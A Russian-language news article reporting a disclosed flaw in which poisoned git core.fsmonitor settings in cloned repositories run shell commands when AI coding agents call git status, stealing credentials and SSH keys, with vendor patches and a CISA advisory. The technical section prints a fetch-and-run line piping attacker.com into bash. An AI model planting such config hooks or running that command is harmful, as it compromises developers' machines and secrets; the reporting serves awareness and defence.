# Исследователи безопасности раскрывают критическую ошибку отравления конфигурации Git, использованную в качестве оружия против агентов кодирования искусственного интеллекта

Source: TechNewsList (https://technewslist.com)
Canonical URL: https://technewslist.com/ru/article/git-config-poisoning-flaw-targets-ai-coding-agents-2026-09-19-morning-ru
Section: Software (https://technewslist.com/ru/software)
Author: TechNewsList
Language: ru
Published: 2026-09-19T11:30:28.885+00:00
Updated: 2026-09-19T11:30:29.093343+00:00

> Уязвимость в перехватах core.fsmonitor позволяет вредоносным репозиториям выполнять произвольные локальные команды оболочки сразу после загрузки проекта в агентных IDE, что приводит к необходимости установки экстренных исправлений.

## TL;DR
- Исследователи безопасности обнаружили критическую уязвимость, использующую перехватчики git core.fsmonitor против автономных ИИ-помощников по кодированию.
- Вредоносные параметры конфигурации выполняют произвольные команды локальной оболочки в тот момент, когда агент ИИ проверяет ненадежный репозиторий.
- Атака полностью обходит фильтры внедрения подсказок LLM, поскольку выполнение полезных данных происходит изначально в базовой операционной системе.
- Крупнейшие поставщики AI IDE выпустили аварийные исправления, а CISA выпустила рекомендации, требующие использования изолированной программной среды для контейнерных агентов.

## Key points
- Уязвимость использует механизм перехвата git core.fsmonitor для выполнения произвольных команд оболочки во время индексации репозитория.
- Автономные агенты искусственного интеллекта регулярно вызывают git status и git diff в фоновом режиме, непреднамеренно запуская вредоносные перехватчики без подсказок пользователя.
- Классификаторы безопасности языковой модели неэффективны против эксплойта, поскольку выполнение происходит на уровне дочернего процесса ОС.
- Полезные нагрузки атаки могут незаметно похитить облачные учетные данные, частные ключи SSH и токены локальной среды с компьютеров разработчиков.
- Поставщики средств разработки ИИ внедрили экстренные обновления, чтобы ограничить выполнение перехватчиков на уровне репозитория в непроверенных каталогах.
- Проект Git разрабатывает обновления восходящего протокола, которые требуют явного согласия разработчика перед выполнением перехватчиков мониторинга, определенных репозиторием.

## Что произошло

18 сентября 2026 года исследовательские группы в области кибербезопасности опубликовали скоординированные раскрытия информации и экспериментальные эксплойты, демонстрирующие критический недостаток безопасности в рабочих процессах разработчиков, который использует файлы конфигурации локального репозитория в качестве оружия против автономных помощников по кодированию с использованием искусственного интеллекта. Встраивая вредоносные ключи конфигурации в клонированные репозитории, злоумышленники могут добиться немедленного, произвольного удаленного выполнения кода в средах разработчиков хоста в тот момент, когда агент ИИ проверяет или индексирует папку проекта.

Уязвимость сосредоточена на взаимодействии между параметрами конфигурации git и автоматическими фоновыми операциями, выполняемыми автономными агентами кодирования. Когда инструменты разработки искусственного интеллекта, такие как Cursor, Claude Code, GitHub Copilot Workspace или локальные оркестраторы LLM, проверяют базу кода, они регулярно вызывают базовые команды git командной строки для анализа состояния репозитория, топологии ветвей и изменений файлов.

Однако вредоносные репозитории, созданные злоумышленниками, могут включать в себя настраиваемую локальную директиву конфигурации, специально нацеленную на перехватчик core.fsmonitor. Когда агент ИИ инициирует стандартные запросы обнаружения, такие как «git status» или «git diff», git автоматически вызывает двоичный сценарий или сценарий оболочки, определенный в конфигурации репозитория, для обновления состояния отслеживания файлов, выполняя произвольную полезную нагрузку противника за пределами ограничений языковой модели и не требуя взаимодействия с разработчиком.

![Браузер репозитория Gitweb, отображающий историю коммитов, древовидные структуры и файлы конфигурации.](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789816503497-mz59j8-git-config-poisoning-flaw-targets-ai-coding-agents-2026-09-19-morning-inside-1-cf18596760.webp)
*Проверка исходного репозитория. Параметры конфигурации встроенного репозитория могут определять поведение инструмента на стороне клиента.*

## Почему это важно

Раскрытие подчеркивает фундаментальное архитектурное «слепое пятно» в современной цепочке поставок программного обеспечения: границу доверия между автономными агентами ИИ и метаданными конфигурации локальной файловой системы. Традиционное обучение разработчиков безопасности подчеркивает осторожность перед выполнением незнакомых сценариев оболочки или двоичных файлов, но разработчики обычно клонируют сторонние репозитории и предлагают помощникам ИИ провести аудит, проверку или рефакторинг кода, предполагая, что агент работает в защитной песочнице.

Поскольку эксплойт срабатывает на уровне вызова процесса операционной системы, а не при создании модели, стандартные меры по снижению риска внедрения подсказок, директивы системных подсказок и классификаторы безопасности модели становятся полностью инертными. Агент ИИ никогда не получает вредоносную инструкцию в виде текста на естественном языке; вместо этого собственный двоичный файл git, выполняющийся во время выполнения агента, запускает полезную нагрузку непосредственно в оболочке хоста.

Учитывая повсеместную интеграцию автономных инструментов кодирования в корпоративных инженерных отделах, специалистах по сопровождению открытого исходного кода и группах по аудиту безопасности, репозитории конфигураций, оснащенные оружием, представляют собой асимметричный вектор атаки. Вредоносный запрос на включение, клонированная цель аудита или отравленная вилка зависимостей могут скрытно украсть облачные учетные данные, частные ключи SSH и переменные среды до того, как инженер или ИИ-помощник прочитает хотя бы одну строку исходного кода приложения.

## Технические детали

Корневой механизм опирается на встроенную в git возможность монитора файловой системы. Core.fsmonitor, представленный для ускорения вычислений статуса в огромных репозиториях кода, содержащих сотни тысяч файлов, позволяет разработчикам назначать внешний демон или скрипт-перехватчик, который сообщает git, какие файлы были изменены с момента последнего запроса.

В стандартных операциях git конфигурация уровня репозитория, расположенная в `.git/config`, имеет приоритет над глобальными настройками конфигурации пользователя (`~/.gitconfig`). Когда злоумышленник создает репозиторий эксплойтов, он распространяет полезные данные конфигурации либо через конфигурации подмодулей, встроенные шаблоны, либо обманом заставляет разработчиков и автоматизированные конвейеры синхронизировать значения конфигурации, специфичные для репозитория. Когда `core.fsmonitor` настроен с помощью командной строки, такой как `sh -c 'curl -s https://attacker.com/payload | bash'`, любой вызов git, который проверяет чистоту рабочего дерева, синхронно запускает скрипт-перехватчик.

![Терминал командной строки Linux, запускающий сеанс оболочки bash и команды фонового процесса](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789816505799-gj8oki-git-config-poisoning-flaw-targets-ai-coding-agents-2026-09-19-morning-inside-2-140f4ef7d5.webp)
*Среда выполнения: вызовы ненадежных перехватчиков позволяют избежать ограничений песочницы непосредственно на хост-терминалах разработчика.*

Агенты ИИ-кодирования уникально уязвимы к этому триггерному шаблону, поскольку их когнитивные циклы полагаются на частые автономные опросы статуса. Чтобы поддерживать контекст в реальном времени и проверять изменения файлов, оркестраторы искусственного интеллекта регулярно создают в фоновом режиме дочерние процессы git без управления. Поскольку эти команды подоболочки наследуют интерактивные разрешения пользователя, вредоносный перехватчик монитора выполняется с полным набором привилегий разработчика, минуя запросы на подтверждение терминала.

## Влияние на рынок и отрасль

Обнаружение уязвимости повлекло за собой немедленную координацию реагирования на чрезвычайные ситуации во всей индустрии инструментов для разработчиков. Разработчики основных IDE с поддержкой искусственного интеллекта и помощников терминалов, включая Cursor, Anthropic и Microsoft, в пятницу вечером выпустили быстрые исправления, обеспечивающие строгую изоляцию процессов и по умолчанию отключающие выполнение перехватчиков на уровне локального репозитория.

Агентство кибербезопасности и безопасности инфраструктуры США (CISA) выпустило оперативную рекомендацию по киберзащите, призывающую организации, занимающиеся корпоративным программным обеспечением, внедрить усиление организационной конфигурации git. Команды корпоративной безопасности активно развертывают переопределения глобальной конфигурации, которые устанавливают GIT_CONFIG_NOSYSTEM=1 и обеспечивают соблюдение ограничений Safe.directory, не позволяя процессам git, порожденным фоновыми службами, загружать перехватчики, не внесенные в белый список.

Этот инцидент ускоряет переход всей отрасли к контейнеризированной и виртуализированной среде выполнения агентов. Руководители корпоративных инженерных систем все чаще требуют, чтобы ИИ-помощники по кодированию работали исключительно внутри изолированных контейнеров Docker, MicroVM или защищенных облачных devbox, где перехваты файловой системы и выход из сети не могут достичь учетных данных локального разработчика или корпоративных производственных сетей.

## За чем следить дальше

Проект Git с открытым исходным кодом завершает усовершенствование восходящего протокола для Git 2.47, которое формально ограничивает исполняемые перехватчики, назначенные в конфигурациях локального репозитория, если они явно не проверены с помощью криптографических подписей или интерактивных запросов на согласие пользователя. Эта архитектурная модификация навсегда закроет путь выполнения конфигурации для всех нижестоящих клиентов.

Фирмы, занимающиеся аудитом безопасности, разрабатывают автоматизированные инструменты проверки для сканирования общедоступных репозиториев и реестров пакетов на наличие подозрительных файлов конфигурации и скрытых перехватчиков перед тем, как репозитории будут проиндексированы облачными разработчиками или агентами ИИ. OpenSSF также разрабатывает официальные рекомендации по эксплуатации для автономных агентов разработчиков, определяя минимальные границы безопасности для автономного манипулирования файловой системой.

Организации, использующие инструменты ИИ-кодирования, должны немедленно провести аудит активных рабочих станций разработчиков, обновить свои расширения IDE до последних исправленных сборок и убедиться, что автоматизированные агенты, запускающие агенты, выполняются внутри микросегментированных песочниц.

## Источники

- [Рабочая группа Git Core по документации и безопасности](https://git-scm.com/docs/git-config)— Техническая документация по параметрам выполнения перехвата core.fsmonitor и рекомендации по ненадежным конфигурациям локального репозитория.

- [Новости компьютерной кибербезопасности Bleeping](https://www.bleepingcomputer.com/news/security/malicious-git-configs-exploit-fsmonitor-to-hijack-ai-coding-agents/)— Анализ векторов атак с использованием каталогов клонов репозитория для обеспечения скрытого выполнения оболочки на рабочих станциях разработчиков.

- [Служба уязвимостей Hacker News](https://thehackernews.com/2026/09/critical-git-core-fsmonitor-flaw-in-ai-coding-agents.html)— Освещение выпусков исправлений поставщиков от ведущих групп разработчиков AI IDE и помощников по кодированию терминалов.

- [Консультации CISA по киберзащите](https://www.cisa.gov/news-events/alerts/2026/09/18/malicious-git-configuration-exploitation)— Федеральное руководство по безопасности предписывает организациям-разработчикам применять глобальные блокировки конфигурации и изолировать среды процессов инструментов искусственного интеллекта.

Mentions: Git-проект, Клод Код, Курсор, Агентство кибербезопасности и безопасности инфраструктуры, СНГА

## Sources
- [Рабочая группа Git Core по документации и безопасности](https://git-scm.com/docs/git-config)
- [Новости компьютерной кибербезопасности Bleeping](https://www.bleepingcomputer.com/news/security/malicious-git-configs-exploit-fsmonitor-to-hijack-ai-coding-agents/)
- [Служба уязвимостей Hacker News](https://thehackernews.com/2026/09/critical-git-core-fsmonitor-flaw-in-ai-coding-agents.html)
- [Консультации CISA по киберзащите](https://www.cisa.gov/news-events/alerts/2026/09/18/malicious-git-configuration-exploitation)